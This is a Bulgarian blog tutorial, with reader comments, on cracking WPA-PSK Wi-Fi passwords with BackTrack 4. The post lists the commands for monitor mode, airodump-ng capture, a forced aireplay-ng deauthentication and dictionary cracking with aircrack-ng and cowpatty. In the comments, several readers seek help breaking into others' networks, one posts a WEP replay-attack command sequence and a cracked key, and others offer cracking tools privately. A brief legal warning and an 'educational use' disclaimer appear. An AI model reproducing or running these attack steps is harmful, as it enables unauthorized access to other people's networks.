Здравейте отново с мен Мартин Петров. Предния път ви демонстрирах как се разбива Wireless с WEP, а сега ще ви обясня как се разбива Wireless с WPA/PSK.
За целта ще използваме live дистрибуцията BackTrack 4 и приложенията в нея .
След като сме заредили нашият BackTrack ще отворим терминал за да подготвим нашият мрежови интерфейс за работа в режим мониторинг
# iwconfig wlan0 mode monitoring
След като настроихме мрежовият ни интерфейс сега ще сканираме за wireless мрежа която да компрометираме с учебна цел
# airodump-ng wlan0
Понеже търсим wireless със WPA кодиране,а тук виждаме такъв прекратяваме с Контрол и C. Wireless мрежата която ще използваме ще бъде "mpetrov_net" на шести канал.
След като избрахме коя мрежа да използваме и видяхме, че тя работи на шести канал е време да пуснем в Терминал 2 airodump за да събирем информация за съответната мрежа.
# airodump-ng -w wpa -c 6 --bssid 00:23:CD:D7:84:FC wlan0
Сега ще отворим Терминал 3 за да изпратим пакети за ре- оторизация. Ще трябва да използваме MAC адреса на клиента които можем да вземем от Терминал 1.
# aireplay-ng -0 1 -a 00:23:CD:D7:84:FC -c 00:1A:73:87:B4:E9 wlan0
След това ще погледнем Терминал 2 и ще видим горе в дясно WPA handshake: 00:23:CD:D7:84:FC с което приключваме събирането на пакети и пристъпваме към кракване на паролата.
За кракване на паролата ще използваме два метода единият е, чрез aircrack, а другият , чрез cowpatty
Първо ще реализираме кракване с aircrack
cd /pentest/wireless/aircrack-g/test
aircrack-ng -w password.lst /root/wpa-01.cap
Сега ще направим кракване с cowpatty:
cd /pentest/wireless/cowpatty
./cowpatty -r /root/wpa-01.cap -f dict -s mpetrov_net
И двата метода успяват да кракнат паролата и да я изведат.
Видео демонстрация от youtube.com: Разбиване на Wireless с WPA encoding (youtube)
Видео демонстрация от vbox7.com: Разбиване на Wireless с WPA encoding (vbox7)
Надявам се, че този видео материал ще бъде използван и интерпретиран единствено с учебна цел.
До скоро от mpetrov.net
PS: Това е истината-> EPRB
Според нашия Наказателен Кодекс манипулирането на wireless мрежи е незаконно:
Чл. 212а. (Нов -- ДВ, бр. 92 от 2002 г.) (1) (Изм. -- ДВ, бр. 38 от 2007 г.) Който с цел да набави за себе си или за другиго облага възбуди или поддържа заблуждение у някого, като внесе, измени, изтрие или заличи компютърни данни или използва чужд електронен подпис и с това причини на него или на другиго вреда, се наказва за компютърна измама с лишаване от свобода от една до шест години и глоба до шест хиляди лева.
(2) (Изм. -- ДВ, бр. 38 от 2007 г.) Същото наказание се налага и на този, който, без да има право, внесе, измени, изтрие или заличи компютърни данни, за да получи нещо, което не му се следва.
Вместо да правите такива гимнастики проосто си платете интернета и ще го имате винаги.
Разбиване на Wireless с WPA encoding,
@ttt_mtd
Няма да стане?! :) Ще стане!
А ти първо се научи да си превключваш линукса за да пишеш на български. после давай съвети.
abe izkam da vi pitam s toq blacktrack 4 znachi trqbva da go zapisha na cd i sled tova da go boot-na? i sled tova da izvarsha vsichkite tezi neshta koito sa opisani………??ta tazi programa kato q imate kadeto razbiva wpn zashto neq kachite nqkade?
vsi4ko e taka kakto go opisvate.v gyrciq si kupih originalen taivanski disk s bt3 i bt4.raboti perfektno metoda.koito se interesuva da pi6e na email [email protected]
Може ли помоля за помощ. Справям се със всичко и в момента в който трябва да ми изскочи паролата ми казва че не я намира в Dictionary-то. От скоро се занимавам с тези неща и поне до колкото разбирам за да разбере паролата трябва да я има или прочете от нещо като библиотека? А от къде мога да си набавя пълна библиотека и дали може някой да ми я прати? Благодаря предварително :)
П.С. Пращайте на [email protected]
Той метода си работи… ама за да отгатнеш парола от над 8 символа си е почти невъзможно -- ако се има в предвид че в паролата има малки букви , големи букви, числа и други специални символи
Здравейте приятели сичко е точно много добър урк :)
искам да ви попитам свалих си един речник за бацктрацк които е около 5 гб. някои от вас може ли да ми каже този речник къде трябва да го поставя и с каква команда се зарежда благодаря ви предварително :)
za6to aircrack-ng nakraq mi dava no file or directory i do tam ne namira koda trqbva li da nastroq ne6to.tova go pravq s backtrack 4 r2 instaliran
Abe, ne vijdate li che tova ne e za vas,aide shte haknete s pomoshta na choveka i ste do tam!!! Pyrvo vzemete nauchete neshto, primerno ustroistvoto i nachina na rabota na internet i togava shte vidite kolko e slojno i ne e za vas. Tova se uchi ot malyk (osobeno za da hakvash), tuk, koito e nad 15 godini e gluak!!!
Znam, kakva shte e reakciqta na gorniq mi post, no tova samo potvyrjdava moite dumi!!!
Не знам вече за кой път пиша тук за малко помощ и никoй не ми отговаря.Проблем е там че не знам как да заредя речник в backtrack 4 самата операционна система е зареждам 4рес VMware Workstation
Моля някой да ми обесни не виждам нищо сложно от това да на пишете 1-2 реда и да помогнете на някого
КоКооО и аз това чакам пич….свалям речници,но незнам как да ги предложа на Бака….четах някъде че трябвало да си Маунтнеш директорията на харда дето ти се намират речниците,пробвах обаче нестава
Здравейте, може ли да ми кажете от къде мога да си сваля речници …???
Имам нчкакъш проблем. Когато използвам aircrack не ми излиза password ами passphrase, а когато използвам cowpatty пак някакъв error ми дава.
Здравей, бих искала да те помоля за малко помощ. Намирам се в Кипър и тук нещата с интернета са повече от сложни…Ако не искам да платя много сериозна сума за инсталация на тел и интернет, трябва да успея да се справя с backtrack:) Не съм се занимавала с такива неща, но инструкциите ти са повече от изчерпателни и много полезни, благодаря за което:) Аз съм с Windows, справих се с бутващия диск, стигнах до момента с "iwconfig wlan…monitoring" и ми излиза грешката -- "error for wireless request 8B06 -- device or resource busy"….и сега не ми е ясно…някакви идеи? Антената ми е Алфа realtek 8187…
abe ostavete go toq rabiva negovite si paroli daite mu druga da go vidim,darvodelez
Zdrasti Valeria, az sam v Agia Napa i ako iskash moga da ti dam programka koiato razbiva WEP(CYTA4H7F73). Za Kipar e perfektna. Pishi mi na poshtata za da ti ya dam.
[email protected]
как става ръчно вдигане на мрежовите интерфейси за backtrack 4?????????
http://www.aircrack-ng.org/doku.php?id=wpa_migration_mode
http://www.backtrack-linux.org/
прочетете 1та статия свалете backtrack-5
пробвайте
успех на 50%
не ползвате речници за разкодиране
трябва ви по голяма флаш памет от порядъка на 16гб
инсталираите на флаш
използвайте тази програамка за инсталиране на флаш universal-usb-installer
свалете от тук
http://universal-usb-installer.en.malavida.com/
abe hora zastose se mesite sas back track ima po dobra programa ot back track deto razbiva sicki klucove ako iska nyakoy dame pita nesto za programata da se obarne kam moyat imeil [email protected]
cowpatty и aircrack Искам да ви попитам тва някви програми ли са който трябва да се инсталират или са си вградено в линукса?
Здравейте, днеска цял ден съм гледал уроци в youtube и накрая я подкарах с VMware, инсталирах я и оправих всичко, НО като напиша # iwconfig wlan0 mode monitoring и ми изписва "No such device".
Пробвах с airmon-ng да открия ама не дава нищо и незнам какво да направя.
Ето го лаптопчето на което тествам http://ardes.bg/laptop/ASUS+K52JB-SX137--32221
Погнете ми ако може! :)
Моля отговаряйте на [email protected] тъй като няма да следя темата :)
О да и забравих да спомена, че бачкам на BT 5!!! Но това едва ли е от голямо значение…
Ne mi se zanimava da pi[a, zatova potyrsete me na skype peio_peev2 . Izvinqvam se za latinicata, no v momenta sym ot backtrack 4 r2 . 6te pomogna s kakvoto moga.
I ne se zanimawaite s virtualni ma6ini. Predpolagam,4e nikoi ne e stisna za 4 gb. fla6ka.
Абе да попитам слагам тоа тап БАКТРАК 5 на флаша сас унеботин пускам го от биоса илиза ми някфи прозорчета там стеалтх моде и тем подобни пуснах го на дефаулт трагна да зарежда и излязаха някфи команди кфо стана и накрая един черен прозорец и до там … е кфо е това пуснах го кам 10 пати един от тези пати ми излези като руна на линдолс такава програмка сас 10 команди са спиране ребоот и някфи подобни ае некои който разбира да ми помогне че от 6 дена я мача тая програмка . Пробвах и друг вариант сас вмл лоркстатион обаче неми чете лифи картата аз сам сас нотебок .
Благодаря предварително ! :–)
пишете ми на [email protected]
dvd cd njama da ti stigne
rumene dvd cd njama da go pobere ako iska6 na cd probvai wifiway tam njama tolkova pisane iso fail zapisva se s image burn tva e
здравеите! имам един проблем. със вин 7 съм. пускам програмата през даимън туулс и не мога да я отвора (отварям я но не знам как да я пусна). моля някои да ми помогне. мерси предварително!
здравейте някой да е разкодирал парола с бт 5 аз я разкодирах обаче за нищо не става паролата само някакви цифри и толкова ето KEY FOUND! [ 5A:34:30:34:41:30:33:37:46:33:44:33:33 ] (ASCII: Z404A037F3D33 )
Decrypted correctly: 100%
ето ги командите за бт5
airmon-ng
airmon-ng start wlan0 1ви терминал
airodump-ng mon0
airodump-ng -c 1 -b XX:XX:XX:XX -w dnsandavideos mon0
aireplay-ng -1 0 -a XX:XX:XX:XX mon0 2ри терминал
aireplay-ng -3 -b XX:XX:XX:XX mon0 3ти терминал
aireplay-ng -0 0 -a XX:XX:XX:XX mon0(Special Attack) 4ти терминал
aircrack-ng dnsandavideos-01.cap
sled kato polzva6 virtyalna mashina probvai purvo da gi zavle4e6 vuv ma6inata i sled tova kogato ti potursi re4nika prosto go provla4i i samo 6te si izpi6e direktoriata probvai moJe i da stane .
@KoKooO
sled kato si blytnal njakude trjbva da ti poiska startirane , i tam 6te napi6e6 startx za da trugne no iz4akai malko se zabavj no 6te trugne
e ako vsi4ko ti e nared @aTishev
znai purvo probvai sis kradkij kod ako ne se vurJe togava vkarai dulgij kod no bez to4kite i 6te se vurJe ako vsi4ko e nared
@serto
здравейте, мога ли по някакъв начин да се сложи wordlist на live cd
@KoKooO
Зареждаш го като го "влачиш" от съответната му директория,на която си го свалил и го пуснеш в терминала…
Малииииии,мнооого неграмотно,братле!Сори,ама Back Track-а програма ли е за теб?Тва си е цяла операционна система!А като си имаш "Програмчици" за хакване на WI-FI обясни какво търсиш тук?Моля те,не пиши глупости и не занимавай хората с такива неща!
@gudko
Той не се лага на Live CD,а на компа(примерно на D),после като заредиш live Cd с Back Track ще го намериш на същото място в харда,където си го свалил!
Това за всяка Wpa ли действа ? Отговори ми, моля те имам още въпроси
Sled # airodump-ng wlan0 kolkoto i da skanira ne namira ni6to.Ako nqkoi moje da mi pomogne ?!!
Zdraveite.Imam malak problem i neznam kak dago resha.Probvam da razbiq edni wifi tuk obache se okaza mai che wifi adaptera na laptopa ne podarja airackraking :X kartata mi e Broadcom bcm4310. tarsih na vsqkade po forumi i kakvoli oshte no bez ospeh ako nqkoi moje da mi pomogne shte sam mnogo blagodaren.Broadcom 802.11g.
Skype:superlubooo
Zdraveite! Az iskam da popitam nali moje router, koito raboti v clientski rejim da moje da se nastroi za da raboti kato WIFI karta i veche ot tam mi e qsno s BACKTRAKCA rutera mi e s ferm DD-WRT. Blagodarq predvaritelno
Got no data packets from target network ! -- dava mi tozi shiban natpis nqkoi ako moje da mi pomogne. Blagodarq predvaritelno.
Стигам до стъпката на която трябва да се покаже WPA handshake …………Но не се показва.Малко помощ?Благодаря предварително
Marto ako moje prati tvoita password.lst koyto polzva6 za6toto moita yvno e nepalna i ne moje da nameri parolata
Здравейте, разгледах филмчето и наистина мисля че е полезно с образователна цел. Малка забележка -- би било полезно да се обяни ЗАЩО се полват различни терминали, а не се пише в един и същи (т. е. че действието в конзола 1 трябва да продължава, докато се изпълнява командата в конзола 2 и т.н.). Конкретният ми въпрос е: с какъв софтуер е заснет екрана, т. е. как е направено филмчето? Благодаря предварително!
nqkoy shte mi razkodira li kod ? :D
който се интересува от WPA2 да пише
skype: free.wifi
@Aneliq
пиши ми на free.wifi